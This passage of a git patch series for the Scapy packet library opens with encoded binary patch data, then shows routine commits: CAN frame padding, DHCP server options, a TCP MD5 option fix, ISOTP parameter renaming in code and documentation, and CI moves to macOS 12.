zr)I5wjLv}tKLN8zB-b92`l6obGJj7%pVn)_M@)FQW~9-|_WfO9JcZ~DGoRqM+_AjG z70y#K&UZhcHRfy^Y+yIS-SeTX&_N&YcplfmRK_iy0TN$#PzYWtGCdz$oQtUQY-(WP zwH6h2?fR(KE$&W8g4Rx^6@ve~tUNkY!KW+9{Hl5USPUn_Az#7CgW(g8E-P3 z2Hyu?I}TPg`*7sqAhj%pE%xoHTT-UZY`=-+-hs}sWa|yxxkrS5s?+Yq~)NDj(B1#G#^wFpg^PO!p}n|c zqnp)CoL&=);w;+=XY+WHH;EAA*%v4#sj@%ONKxEGWE)u(l&tzjIzd!1hx+iYL|N~_ z`LhVkc8phZT{p#2)wqvmax~ zvBTgVZ@;2-#$4spvPRnI1wGfN&~t^hmW(ZWUb6W{781Ukg1nC)T^*7W5`^JRte0^r zxDx&Y>y;yN6eB|=Kfly#pflTGjPZcEGIO7&sK!dSJD6o3miaH6G&drl7&+1yo;;*s z#SI_ubU&O~Kvba~{)t4$X^J3~ilH8?j0UV;Amb@yT>a;rBxGELlY-6v^-l8EniUS5 zz6zP&?kW5}zrmqe1J4P6&TqiD3I>{iu^SEqc<75od|2JPZfFyDp0hnAl*x9BU*s`V zrr$)EyhSsxo~aT$o?0p%PD(h=dS%&4kb)$QcXk;0BI1tDR&%wtC{f#3f6Q#;8N9z% zc0+n-!A{|K+7Fsa7ozl=;1^6;QBM@&@INs!bl2MV2cYSM_4wvJEy*isXvU!H>mS+*kjv&0NTCtb#)(J1bGM~x0K}lLg=iYn!akD#zxa$J8nSwl;m8eC?Dkd} z)vJ;3+MwqKt(MC&>%?Po_Z<;65+#DVj2L-d)^Kphcsqti&%W4CS;|YL5LiJmQ;Is^ zj#zLb!bFc;Lz(;04=Pe#L=kT-Tb*{Bge5>QGTlbQ zgC>cj^$u|ld6~9V-3m;jhNaWD`2}75(V1&mrz@enjxL{*ev&Ll9-Jzwe1OqeNAM(D zvXvr!=u%3{(pkN3NK!(iyfEfDZ5;QMXr>+%_85^{>s)G>~<8l`DaFW3m#NCCg4dn#yy` z>2Vf|*)y_qJ9J`wrjqK3FdTC0wygGI@D+%>OLxD|8%beNe<`V`R_C=MPI>lW{3p`x zpK;|JlP25uumcFzyPMpqFr1{yac2+hxb=h5&JK8kyF9f8PIuPK^*;7vj`^pes`+ix zmlM7^rLH^>UVMNwN=Ut0cHegNz~~$>I1dZofLWtW2+Afj2s6(#SzP!FN-y7~fAGs= zksY`3KHmOWyEey;Jv^T&@rnzM9jq4aa6DDd@^G@T4j_^3P!yAnLxTVUf{ z1idMhDoGd?g3lXFkjqd;H^xi8Q*1r0AFN1E{g&U0uvy{m$F{cGDzDgdC0l#v99u>> zT=kK*IfMCN7II`C;(_NyXYrZs+j9;~XtYoyj-%p9~yTG+(94r>$IM1{}8kP z?Xrrtlp*TT?)d1}=%h$okhI^7r2|hlz%$R-?{fmkPfGhqo%&-)4(C5fS<}!-zAbF1>SR3Qh`@pO>&)%n z-fm5NM-fwI89Yna9^pe-&Ov)Z>GAq?c-6a4$Ico0*)B6#{Bu7py+va`ywo@@BAifl zO16OsSK-?4EY3z@73DA=P3(+$OW>nlJ|TpmdwS8r%RM=;Fn{*<9ESFS&41-^+hd3Z z9bIwgzR95;{+a{yHHZB>nlQu)mPtDCCub!pFO3Rm^Z+A`|q$jzYd7CT8;=Xv6HSiacSa$zC zhg}@A_rG%Zlf&^9hpw9(1YE8;z+7`UX!mVtSy}s@;Cp65_@k!8mk&oYwZ1=KEDQ(p zZ9P1LeXIDLWyJR@mwT}EsXm-L)p;pl-fpj7o;{OU&X-VxrLvjtepg;9e#{f@SvR<( z0JZ6To^LDN0o9B;?b&Q(s=!1vZ=udbE&2BxGP>PTf93Ee2f$4N?uU_^9EhE+Ilx?V zm^<7Osl<%bOHX)56BWzi+9o}`P&hX^kZ_nF+i0nqC?rr8DQ9tSMa_(l=!2%y2nh8< z!rpy~*25rvGK6~gHynj$h=FUQGwCc^b!z^eg9tau^sgNLlY4cN2e>FC!#^G|WPV7Cl)e1V-seH)m5(8DgM)^$2rw}G;U_VJZ+hw1K8CPv zaS=R{AD=v%bz}9}*`6t!>XG1Or}!yrknk?zNfj{i-S$3}fVgU+#jkwy|KOzq?;Zg! z{ib)VfHV3Z;sOKh&_ERdD&_Taz}I~>U2m##ezbTTA;Z`Do}xYZ#ga>K>A*Y+@$?~M z-#;$aXTMh3&H7$(3P_PT_@iI4Rw0ZaNuf0{~hpZ3`*b;#Yg~0fWA5`1Fb^6Ck zR|fi%U-;>h|Lmn7=|XfGNdH|YC=sJY;5$LO=ChmKeB8kMy?>SejhBx4f8wQEg5K}! z@O7DV`5JY+-+%u@P5g%sS4m|9m%|xd({oNwzY9kUTJoBscQoC!!uvIFF~o=oBIer> zX6Z>R<9_cAAzr%cVldRXZ&<^oAnU3)+&A$d8>edbefO*^K9?HMV-lij>qWyP0a&sB zKfH7ZgS~*6r~k!E-?_S{QGV|eP?8&Z5Y_)-;FVlYACYog`M>ef|Bo1yPJRsQZ&r20 zRuwN~BXn=&5nw`-v3W6-;Btna)hlUG$0J6)Q+>ycF;R34WAw|NkS)DKavIY>Dp?Xc zHF~8(V1QuURhEm5M?S3D6MjVLOz$l`OrSNJ1H*Wr&vo%l4ae6qjlU7ueIC#2f8I+s z2D~3gfpGY&AmAYc>_h79XB0TrBR$By(0gMo07rZw06F_Mhu^$(Ou$P&=o{6O~d=RNM8Q}UD2B|hOU+cJ$8p^e0UUw|Alulhij;f41;^OBM$G{&at zLj+n4H{F`Y`bxIFGVN7d{36(aAPKGbV&{A`Rm2Kz{w;%!0%h5kUL`{wNkQIsaNsKr zJ_$-%jjg`ZPGbICo*$H0GClDmtYzZ0^lon(4~!^Az)Gnq3Bk(p;;V}Q7ZD9*(%H>W z-WBehw3PklETn!)+2?D!IX=qOPN+~g2N+JypI%ISbjeSc2v()Yw+hA5FRhq`bi_a_)sL zn!pp?N8yamGYv@>)^H^IUSi6_uAoMgSA%d{)B7hGmBBu`oPISJzU;q{qYqX zZ-~~Ch1Y$-1SD{{bSip+00HJ3=L{v3?~j*=H!&Sdu@93mTVIB>d(ozp=k3*(p=ugg z|45{k?kWon^@4)d%P$ouOMW1Fl5I`MkZ11hH{K2Ih_sO#%G4&zoIW5{)&8I#MV$L= zhKLHD#kTO&6$vYz3@MQ0o4*STG1@_3?V*q&i7N40|M?|U)WbZF(6RKB)G%GK)lzFV zHuNQa&WD(E^jrr8w1MLG-ONw?7{LlL5RNm6Ae|bx>z$EU-_&b`}?I2hzuCyt{zjk|8NzuS*e+f(ibJrmUU5VrpmrhR2ks(mp(`RuV?bp|?^*@|00N{6l|gENaFU*f(&f*oDlf#Lj0 zx*mgte7yDZVJt6p%FTipKgoORbI3|B9kRW+`z?f|>{pf#3koN;8qec<#JGeJ({s%8 z-Ly-N>DF|t$Uk4rx{jtp9w?R48nX_NNo`1NpX1p@Pw!%Sfd2@ zzJpud>)??l=e&e_({F>{aQ~3gbwq>(dr*(PNhm1huDr-;re=I*DrSB#7`i!zJ!VU0 zp?N+QYmS*_Lp%I@_Xlw=h8?r^aSS#VROUAa=RVmV0`7gY#ji`;?C#c%zc!|e65dMP z{YiM|ezVfgi%rHn=8&2q937d0;Q4zju-PipLtI{uI#janKNk7n>}tqsg@(#5Ll}>8 zBBIG4Xq_fCRjcwk<~hQTFwY{TsVoo(GOj|_uD_43#y|Q!e~quVo>Smh({~~B+&zxp z=Q%jyUf?%Se;r@JKr_Ts#{@j}1M2Di54*g1dZ+v)Xk|MbjcJj!wiF#ILJhF9&`W6_ z?1FiO>1-JSQSFUhR%B@&Gcy}6z%1~4KE|C%cbn{;BU352wx7r^COcCojPelXfG=MB7y%f0uDxpw-ZLyHms*`J;PJGfA4~YY2hJtNzr@F-Xb3piCvlGbDVwF zb4liVV+N9FSlc-mx)B*v3_-clPlZt6SzjLskw!_+&hM0mOhxsYsE&;kq_vL-JdMRm z#SD4NGsmL?au4t+jLkNdAecfElkzJ{Kl|3P6q*Q=%@3FYkUv&CZI>~{8YELwW?Dp|y4to~JC6iDmTHJ9ZnNq3hE4^_v zOT?KaBwr~$bIu)lxGtjhHOm|JgT}pNe}n8AChQ0MOesO^c zAr<|ToU`DDMr%gu#*0pS9;Ny`f#Y4a#n?;VeDHGB7-b=`E~YHLs2|)CwEI^$5sy;7 zwRSAR1Sac`sit}q*!AaG$5o1!4y3Yz)eJFD5i-HGc(21xEvfE3iokXBqbW`)kj^OjycriKFN?3rCvb6Y{;H|Uqd%KE;xRrGR4u} z7j?O;qld7{+lo_R3~L`Vqdk9zxF)W#TV<6&U*?;b0zY=S%G_jmu;}1)sT!2)1wp3| z$JD~yalP7T2$)}bX#;Kd+*xW&X`75_mtCxs(^{W3a~nSS70o!;QzGtES(Vy(v}6=n zhga|F>ua?@)ah1ew#)?eUuH7JCl;dgce^mO-h~pg6urwj6{@+sC-WsU0@+@4C8}9C zlcn3MG2ob!0JX#{z!$o`)fr*Jw9;jANw)Wlq5Y%b`EnSJl|VO5g+`90*O;Hoi-F%ke{L=V$=~JMDo(Vnt^4skw?FGX~hzpWX@>3CSqdy@9}jQ zGCTqWvVN`6zc?xewjuTQ`W2K0y14SPihqBW14XfsmzV9m1CEFC4B5cP0}m+R(%%bu zPV!(e9>H--G-aVs=Um5ljM0YaBUwQpXqKtox!y)M=hCSEaQpFH92w_#_Mzk?E%fn; zJS2MyeV0E4T_dQx7vbwL>$C&Xq~N3ds!a^Kl1NRLQ*Zzo25 zLg?*$wPL9y*J4WnyitYZ0+};@&*{_Z#__M5Zp|5>wDi5JXQTSx=L}HPhvud+eBgQ@ zD7Un)S*dnH-=u$pR4Sb2U?M7{d}g-)CJ)Mo^_fO|i-CAh8K+w^(voPiFZY9fDQ|p) zIXs)0tw+3^!`OCBBHGNo)p`m6Q@k67QPs!?kF+W>gP|>_TwlucktF55+Bk81g6*C@ zhFf*F9rJgG&n-q&ghfQWQjHpsF0#mPANT*6lM29z;9DpAubggsC263`D^5i>Ioaf0 zbArCDqZ5tby@Va-cET-oJ@N}dwypsoXII9&u|{K_A1-yE0%Vr{JR$C%m8ybm>K`_W zbH{6@xWN&zn9&{8PrjMD=xa4TOBfa4b9bOk-b(O*Hc_&FqxJR)yCMir8u`AeIinh@ zvX*h@YQgg6`>)l`9pJy`w4#;5@hhi4IqhF@s=LYQsme7c=-WD;#cTQvAIL}<#(jc~ z#zR)$8jGL%l7hmQro>^prGIB{3p_Y!srbEb|MmB=vOTW`v!PbA^17%7ijKiTvBBb;+IJ|z(8 zH$9|e&| z+MAq^G_E-c$mZZr3clIK<_8oi1&u)oK$PMf*v(!8Z#xGUsS^L!U}%ypPcA?uDV@9aqf$D zlEcLMO1wOaI;-9x<|~WF{lmGzzvnc`ZIJUTr$0FXpa4zbBObX6uP>iS4r$68mMV`= z$?4t&wKj2Z_*R*5!VURi2J5pvVz8*RDAbh+DQ@!^=CD6oMJN!%#jD2+M?5)KJld6# z==DbWdroUTOu4^u`jZpzz7+8EYi@GNw7=#Ads|1R^;ETj2~?@ez@s^0TXC7bhidg{ z%bSCx7B$gbj&-)Eq@53%UVfEQ!HYSm*czBKTcvl;iKwCPIMKMrG_M^;_5w_khj*y9 z+(*0uPt)tE<6Uys5<&4hP8gw$tHwQ5>(@5NtM|Lfvy$0I1C+V||NEc&={<0lKnmo3 za)uM`^#Qga^^f_<@q`WHuk_!XpY$bwpTqxc{r}73R{;*-to^W2G1&iI*l$DlWvFiN zkqj{{N>+g`yp8LVvb?C-Z%x*vHIMP=alhnsvtDZXI)Xs&fvZC18ptQ4K;kn&=j{6x z-)+qu(~qt+-@2i>{+&R`*?;;!RA8VP;`OTlmGk0_cuqS^HI{Z^u%Vbik9;c)Ws@8G zsr*-8zSmzZ6WUm^G{+<1L2P&pDTPlP?*RW>;yrNM?f675|7(1}J42vPY~G9y(*n5A z-{ONbL&}wY_O9y$#EHP5|PKKs4&{lE~{aOYg| zq7;t0{qOOC>jnR<-|hR*@r3h=@6G#A-_srv#9#EIg|q|ZO25)=LZ=Ugti_U<@H3%G zhz64aDFPciLOqDe35Inu!x|So)qAY@t`BSM!pqO41El{RU!tMt+%LX=#>aCNU*3&z zLO&On!~Yr|BG3%+-mmm43=omTaw1}BAt^mBbHFGs^V^t2Do?Vm#P<~q=1X(&Lognd zAt}Y|V@^V~6?9Pjdwe8 Date: Tue, 8 Nov 2022 20:13:06 +0100 Subject: [PATCH 0917/1632] Bugfix: Add padding of CAN frame for kernel socket --- scapy/contrib/cansocket_native.py | 2 ++ 1 file changed, 2 insertions(+) diff --git a/scapy/contrib/cansocket_native.py b/scapy/contrib/cansocket_native.py index 64783dd824a..36fa60f833a 100644 --- a/scapy/contrib/cansocket_native.py +++ b/scapy/contrib/cansocket_native.py @@ -141,6 +141,8 @@ def send(self, x): unpack_fmt = ">I%ds" % (len(bs) - 4) bs = struct.pack(pack_fmt, *struct.unpack(unpack_fmt, bs)) + bs = bs + b"\x00" * (self.MTU - len(bs)) + return super(NativeCANSocket, self).send(bs) # type: ignore From 0bcb487ad61d13856d8308d0295e57b553b458a5 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Thu, 3 Nov 2022 11:53:03 +0100 Subject: [PATCH 0918/1632] More flexibility in dhcpd --- scapy/layers/dhcp.py | 55 ++++++++++++++++++++++++++------------ test/scapy/layers/dhcp.uts | 3 ++- 2 files changed, 40 insertions(+), 18 deletions(-) diff --git a/scapy/layers/dhcp.py b/scapy/layers/dhcp.py index 2e2f832e462..698be33e38e 100644 --- a/scapy/layers/dhcp.py +++ b/scapy/layers/dhcp.py @@ -588,8 +588,22 @@ class BOOTP_am(AnsweringMachine): filter = "udp and port 68 and port 67" send_function = staticmethod(sendp) - def parse_options(self, pool=Net("192.168.1.128/25"), network="192.168.1.0/24", gw="192.168.1.1", # noqa: E501 - domain="localnet", renewal_time=60, lease_time=1800): + def parse_options(self, + pool=Net("192.168.1.128/25"), + network="192.168.1.0/24", + gw="192.168.1.1", + nameserver=None, + domain="localnet", + renewal_time=60, + lease_time=1800): + """ + :param pool: the range of addresses to distribute. Can be a Net, + a list of IPs or a string (always gives the same IP). + :param network: the subnet range + :param gw: the gateway IP (can be None) + :param nameserver: the DNS server IP (by default, same than gw) + :param domain: the domain to advertise (can be None) + """ self.domain = domain netw, msk = (network.split("/") + ["32"])[:2] msk = itom(int(msk)) @@ -597,10 +611,11 @@ def parse_options(self, pool=Net("192.168.1.128/25"), network="192.168.1.0/24", self.network = ltoa(atol(netw) & msk) self.broadcast = ltoa(atol(self.network) | (0xffffffff & ~msk)) self.gw = gw + self.nameserver = nameserver or gw if isinstance(pool, six.string_types): pool = Net(pool) if isinstance(pool, Iterable): - pool = [k for k in pool if k not in [gw, self.network, self.broadcast]] # noqa: E501 + pool = [k for k in pool if k not in [gw, self.network, self.broadcast]] pool.reverse() if len(pool) == 1: pool, = pool @@ -617,7 +632,7 @@ def is_request(self, req): return 0 return 1 - def print_reply(self, req, reply): + def print_reply(self, _, reply): print("Reply %s to %s" % (reply.getlayer(IP).dst, reply.dst)) def make_reply(self, req): @@ -646,18 +661,24 @@ class DHCP_am(BOOTP_am): def make_reply(self, req): resp = BOOTP_am.make_reply(self, req) if DHCP in req: - dhcp_options = [(op[0], {1: 2, 3: 5}.get(op[1], op[1])) - for op in req[DHCP].options - if isinstance(op, tuple) and op[0] == "message-type"] # noqa: E501 - dhcp_options += [("server_id", self.gw), - ("domain", self.domain), - ("router", self.gw), - ("name_server", self.gw), - ("broadcast_address", self.broadcast), - ("subnet_mask", self.netmask), - ("renewal_time", self.renewal_time), - ("lease_time", self.lease_time), - "end" - ] + dhcp_options = [ + (op[0], {1: 2, 3: 5}.get(op[1], op[1])) + for op in req[DHCP].options + if isinstance(op, tuple) and op[0] == "message-type" + ] + dhcp_options += [ + x for x in [ + ("server_id", self.gw), + ("domain", self.domain), + ("router", self.gw), + ("name_server", self.nameserver), + ("broadcast_address", self.broadcast), + ("subnet_mask", self.netmask), + ("renewal_time", self.renewal_time), + ("lease_time", self.lease_time), + ] + if x[1] is not None + ] + dhcp_options.append("end") resp /= DHCP(options=dhcp_options) return resp diff --git a/test/scapy/layers/dhcp.uts b/test/scapy/layers/dhcp.uts index dd2346dd58d..9016486d39b 100644 --- a/test/scapy/layers/dhcp.uts +++ b/test/scapy/layers/dhcp.uts @@ -97,4 +97,5 @@ assert DHCPRevOptions['static-routes'][0] == 33 assert dhcpd import IPython -assert IPython.lib.pretty.pretty(dhcpd) == '' +assert IPython.lib.pretty.pretty(dhcpd) == '' + From 138178167889a5f06b7e342bd0a63aa73b875c7d Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Tue, 15 Nov 2022 13:23:04 +0100 Subject: [PATCH 0919/1632] Fix RandTCPOptions for MD5 (#3784) * Fix RandTCPOptions for MD5 * Add test --- scapy/layers/inet.py | 6 ++---- test/scapy/layers/inet.uts | 10 +++++++++- 2 files changed, 11 insertions(+), 5 deletions(-) diff --git a/scapy/layers/inet.py b/scapy/layers/inet.py index 28d326b805a..5dcc70431d7 100644 --- a/scapy/layers/inet.py +++ b/scapy/layers/inet.py @@ -7,8 +7,6 @@ IPv4 (Internet Protocol v4). """ -from __future__ import absolute_import -from __future__ import print_function import time import struct import re @@ -363,7 +361,7 @@ def _fix(self): rand_vals.append((oname, b'')) else: # Process the fmt arguments 1 by 1 - structs = fmt[1:] if fmt[0] == "!" else fmt + structs = re.findall(r"!?([bBhHiIlLqQfdpP]|\d+[spx])", fmt) rval = [] for stru in structs: stru = "!" + stru @@ -2094,7 +2092,7 @@ def IPID_count(lst, funcID=lambda x: x[1].id, funcpres=lambda x: x[1].summary()) classes += [t[1] for t in zip(idlst[:-1], idlst[1:]) if abs(t[0] - t[1]) > 50] # noqa: E501 lst = [(funcID(x), funcpres(x)) for x in lst] lst.sort() - print("Probably %i classes:" % len(classes), classes) + print("Probably %i classes: %s" % (len(classes), classes)) for id, pr in lst: print("%5i" % id, pr) diff --git a/test/scapy/layers/inet.uts b/test/scapy/layers/inet.uts index 6a3a0c7628c..dd7efa68c86 100644 --- a/test/scapy/layers/inet.uts +++ b/test/scapy/layers/inet.uts @@ -361,6 +361,14 @@ pkt = fuzz(pkt) options = pkt.options._fix() options += TCP random options - MD5 (#GH3777) +~ python3_only +random.seed(0x2813) +pkt = TCP(options=RandTCPOptions()._fix()) +assert pkt.options[0][0] == "MD5" +assert pkt.options[0][1] == (b'\xe3\xa0,\xdc\xe4\xae\x87\x18\xad{\xab\xd0b\x12\x9c\xd6',) +assert TCP(bytes(pkt)).options[0][0] == "MD5" + = IP, TCP & UDP checksums (these tests highly depend on default values) pkt = IP() / TCP() bpkt = IP(raw(pkt)) @@ -629,7 +637,7 @@ def test_IPID_count(): random.seed(0x2807) IPID_count([(IP()/UDP(), IP(id=random.randint(0, 65535))/UDP()) for i in range(3)]) result_IPID_count = cmco.get_output() - lines = result_IPID_count.split("\n") + lines = [x.strip() for x in result_IPID_count.split("\n")] assert len(lines) == 5 assert(lines[0] in ["Probably 3 classes: [4613, 53881, 58437]", "Probably 3 classes: [9103, 9227, 46399]"]) From 7eeb437aa58183efa0cac45bb945285c82eab825 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Wed, 16 Nov 2022 12:58:47 +0100 Subject: [PATCH 0920/1632] Remove SID and DID from ISOTP and documentation (#3791) * Remove SID and DID from ISOTP and documentation * remove scanner tests from pypy * remove scanner tests from pypy Co-authored-by: Nils Weiss --- .github/workflows/unittests.yml | 2 ++ doc/scapy/layers/automotive.rst | 20 ++++++++++---------- scapy/contrib/isotp/isotp_native_socket.py | 14 +++++++------- 3 files changed, 19 insertions(+), 17 deletions(-) diff --git a/.github/workflows/unittests.yml b/.github/workflows/unittests.yml index 2a97ce3238b..6cfe7b5768f 100644 --- a/.github/workflows/unittests.yml +++ b/.github/workflows/unittests.yml @@ -91,10 +91,12 @@ jobs: python: "pypy2.7" mode: root allow-failure: false + flags: " -K scanner" - os: ubuntu-latest python: "pypy3.9" mode: root allow-failure: false + flags: " -K scanner" # Libpcap test - os: ubuntu-latest python: "3.10" diff --git a/doc/scapy/layers/automotive.rst b/doc/scapy/layers/automotive.rst index eab616bae0c..3bc11285fee 100644 --- a/doc/scapy/layers/automotive.rst +++ b/doc/scapy/layers/automotive.rst @@ -769,13 +769,13 @@ Create CAN-frames from an ISOTP message:: Send ISOTP message over ISOTP socket:: - isoTpSocket = ISOTPSocket('vcan0', sid=0x241, did=0x641) + isoTpSocket = ISOTPSocket('vcan0', tx_id=0x241, rx_id=0x641) isoTpMessage = ISOTP('Message') isoTpSocket.send(isoTpMessage) Sniff ISOTP message:: - isoTpSocket = ISOTPSocket('vcan0', sid=0x641, did=0x241) + isoTpSocket = ISOTPSocket('vcan0', tx_id=0x641, rx_id=0x241) packets = isoTpSocket.sniff(timeout=0.5) ISOTP Sockets @@ -817,7 +817,7 @@ socket creation. This ensures that ``ISOTPSoftSocket`` objects will get closed properly. Example:: - with ISOTPSocket("vcan0", did=0x241, sid=0x641) as sock: + with ISOTPSocket("vcan0", rx_id=0x241, tx_id=0x641) as sock: sock.send(...) ISOTPNativeSocket @@ -834,7 +834,7 @@ reliability, usually. If you are working on Linux, consider this implementation: conf.contribs['ISOTP'] = {'use-can-isotp-kernel-module': True} load_contrib('isotp') - sock = ISOTPSocket("can0", sid=0x641, did=0x241) + sock = ISOTPSocket("can0", tx_id=0x641, rx_id=0x241) Since this implementation is using a standard Linux socket, all Scapy functions like ``sniff, sr, sr1, bridge_and_sniff`` work out of the box. @@ -848,7 +848,7 @@ Usage on Linux with native CANSockets:: conf.contribs['ISOTP'] = {'use-can-isotp-kernel-module': False} load_contrib('isotp') - with ISOTPSocket("can0", sid=0x641, did=0x241) as sock: + with ISOTPSocket("can0", tx_id=0x641, rx_id=0x241) as sock: sock.send(...) Usage with python-can CANSockets:: @@ -856,7 +856,7 @@ Usage with python-can CANSockets:: conf.contribs['ISOTP'] = {'use-can-isotp-kernel-module': False} conf.contribs['CANSocket'] = {'use-python-can': True} load_contrib('isotp') - with ISOTPSocket(CANSocket(bustype='socketcan', channel="can0"), sid=0x641, did=0x241) as sock: + with ISOTPSocket(CANSocket(bustype='socketcan', channel="can0"), tx_id=0x641, rx_id=0x241) as sock: sock.send(...) This second example allows the usage of any ``python_can.interface`` object. @@ -886,8 +886,8 @@ Import modules:: Create to ISOTP sockets for attack:: - isoTpSocketVCan0 = ISOTPSocket('vcan0', sid=0x241, did=0x641) - isoTpSocketVCan1 = ISOTPSocket('vcan1', sid=0x641, did=0x241) + isoTpSocketVCan0 = ISOTPSocket('vcan0', tx_id=0x241, rx_id=0x641) + isoTpSocketVCan1 = ISOTPSocket('vcan1', tx_id=0x641, rx_id=0x241) Create function to send packet on vcan0 with threading:: @@ -904,8 +904,8 @@ Create function to forward packet:: Create function to bridge and sniff between two buses:: def bridge(): - bSocket0 = ISOTPSocket('vcan0', sid=0x641, did=0x241) - bSocket1 = ISOTPSocket('vcan1', sid=0x241, did=0x641) + bSocket0 = ISOTPSocket('vcan0', tx_id=0x641, rx_id=0x241) + bSocket1 = ISOTPSocket('vcan1', tx_id=0x241, rx_id=0x641) bridge_and_sniff(if1=bSocket0, if2=bSocket1, xfrm12=forwarding, xfrm21=forwarding, timeout=1) bSocket0.close() bSocket1.close() diff --git a/scapy/contrib/isotp/isotp_native_socket.py b/scapy/contrib/isotp/isotp_native_socket.py index 2e9a5d49edf..a99d8c0de99 100644 --- a/scapy/contrib/isotp/isotp_native_socket.py +++ b/scapy/contrib/isotp/isotp_native_socket.py @@ -225,21 +225,21 @@ def __get_sock_ifreq(self, sock, iface): raise Scapy_Exception(m) return ifr - def __bind_socket(self, sock, iface, sid, did): + def __bind_socket(self, sock, iface, tx_id, rx_id): # type: (socket.socket, str, int, int) -> None socket_id = ctypes.c_int(sock.fileno()) ifr = self.__get_sock_ifreq(sock, iface) - if sid > 0x7ff: - sid = sid | socket.CAN_EFF_FLAG - if did > 0x7ff: - did = did | socket.CAN_EFF_FLAG + if tx_id > 0x7ff: + tx_id = tx_id | socket.CAN_EFF_FLAG + if rx_id > 0x7ff: + rx_id = rx_id | socket.CAN_EFF_FLAG # select the CAN interface and bind the socket to it addr = sockaddr_can(ctypes.c_uint16(socket.PF_CAN), ifr.ifr_ifindex, - addr_info(tp(ctypes.c_uint32(did), - ctypes.c_uint32(sid)))) + addr_info(tp(ctypes.c_uint32(rx_id), + ctypes.c_uint32(tx_id)))) error = LIBC.bind(socket_id, ctypes.byref(addr), ctypes.sizeof(addr)) From 1c177f321f958dd4c061f5cf43e1d6dbfb5991bb Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Wed, 16 Nov 2022 13:00:43 +0100 Subject: [PATCH 0921/1632] Use macOS 12 (#3788) * Use macOS 12 * Disable libpcap tests on MacOS 12, Python 2.7 --- .github/workflows/unittests.yml | 6 +++--- scapy/tools/UTscapy.py | 7 ++++--- test/bpf.uts | 2 +- test/regression.uts | 20 ++++++++++---------- 4 files changed, 18 insertions(+), 17 deletions(-) diff --git a/.github/workflows/unittests.yml b/.github/workflows/unittests.yml index 6cfe7b5768f..15bc77c2daf 100644 --- a/.github/workflows/unittests.yml +++ b/.github/workflows/unittests.yml @@ -104,11 +104,11 @@ jobs: installmode: 'libpcap' allow-failure: false # MacOS tests - - os: macos-10.15 + - os: macos-12 python: "2.7" mode: both allow-failure: false - - os: macos-10.15 + - os: macos-12 python: "3.10" mode: both allow-failure: false @@ -123,7 +123,7 @@ jobs: allow-failure: true flags: " -k scanner" # MacOS tests - - os: macos-10.15 + - os: macos-12 python: "3.10" mode: both allow-failure: true diff --git a/scapy/tools/UTscapy.py b/scapy/tools/UTscapy.py index 34c858a8336..503aa4e2d1c 100644 --- a/scapy/tools/UTscapy.py +++ b/scapy/tools/UTscapy.py @@ -27,7 +27,7 @@ import warnings import zlib -from scapy.consts import WINDOWS +from scapy.consts import WINDOWS, DARWIN import scapy.libs.six as six from scapy.config import conf from scapy.compat import base64_bytes, bytes_hex, plain_str @@ -1130,8 +1130,9 @@ def main(): KW_KO.append("disabled") # Process extras - if six.PY3: - KW_KO.append("FIXME_py3") + if six.PY2 and DARWIN: + # On MacOS 12, Python 2.7 find_library is broken + KW_KO.append("libpcap") if ANNOTATIONS_MODE: try: diff --git a/test/bpf.uts b/test/bpf.uts index eea7c51141b..2be16fc8786 100644 --- a/test/bpf.uts +++ b/test/bpf.uts @@ -36,7 +36,7 @@ from scapy.arch.bpf.supersocket import get_dev_bpf fd, _ = get_dev_bpf() = Attach a BPF filter -~ needs_root +~ needs_root libpcap from scapy.arch.bpf.supersocket import attach_filter attach_filter(fd, "arp or icmp", conf.iface) diff --git a/test/regression.uts b/test/regression.uts index e4a05e0124c..1ede355bf2f 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -1811,7 +1811,7 @@ def _test_select(select): assert _test_select() = Test L2ListenTcpdump socket -~ netaccess FIXME_py3 +~ netaccess # Needs to be fixed. Fails randomly #import time @@ -2029,13 +2029,13 @@ assert list(pktpcap) == list(sniff(offline=fdesc)) fdesc.close() = Check offline sniff() with a filter (by filename) -~ tcpdump +~ tcpdump libpcap pktpcap_flt = [(proto, sniff(offline=filename, filter=proto.__name__.lower())) for proto in [ICMP, UDP, TCP]] assert all(list(pktpcap[proto]) == list(packets) for proto, packets in pktpcap_flt) = Check offline sniff() with a filter (by file object) -~ tcpdump +~ tcpdump libpcap fdesc = open(filename, "rb") pktpcap_tcp = sniff(offline=fdesc, filter="tcp") fdesc.close() @@ -2043,7 +2043,7 @@ assert list(pktpcap[TCP]) == list(pktpcap_tcp) os.unlink(filename) = Check offline sniff() with a PcapNg file and a filter (by file object) -~ tcpdump +~ tcpdump libpcap pcapng_data = b'\n\r\r\n`\x00\x00\x00M<+\x1a\x01\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\x04\x009\x00TShark (Wireshark) 3.2.3 (Git v3.2.3 packaged as 3.2.3-1)\x00\x00\x00\x00\x00\x00\x00`\x00\x00\x00\x01\x00\x00\x00\x14\x00\x00\x00\xe4\x00\x00\x00\xff\xff\x00\x00\x14\x00\x00\x00\x06\x00\x00\x00<\x00\x00\x00\x00\x00\x00\x00\x98\xcd\x05\x00\x19\x83\xf7\x9e\x1c\x00\x00\x00\x1c\x00\x00\x00E\x00\x00\x1c\x00\x01\x00\x00@\x11|\xce\x7f\x00\x00\x01\x7f\x00\x00\x01\x005\x005\x00\x08\x01r<\x00\x00\x00' @@ -2057,8 +2057,8 @@ packets = sniff(offline=filename, filter="udp") os.unlink(filename) assert UDP in packets[0] -= Check offline sniff() with Packets and tcpdump -~ tcpdump += Check offline sniff() with Packets and tcpdump with a filter +~ tcpdump libpcap l = sniff(offline=IP()/UDP(sport=(10000, 10001)), filter="udp") assert len(l) == 2 @@ -2072,7 +2072,7 @@ l = sniff(offline=IP()/UDP(sport=(10000, 10001)), filter="tcp") assert len(l) == 0 = Check offline sniff() with Packets, tcpdump and a bad filter -~ tcpdump +~ tcpdump libpcap try: sniff(offline=IP()/UDP(), filter="bad filter") @@ -2288,8 +2288,8 @@ data = tcpdump([Ether()/IP()/ICMP()], dump=True, args=['-nn']).split(b'\n') print(data) assert b'127.0.0.1 > 127.0.0.1: ICMP' in data[0].upper() -= Check tcpdump() command with linktype -~ tcpdump += Check tcpdump() command with linktype +~ tcpdump libpcap f = BytesIO() pkt = Ether()/IP()/ICMP() @@ -2314,7 +2314,7 @@ f.close() del f, pkt = Check tcpdump() command with linktype and args -~ tcpdump +~ tcpdump libpcap f = 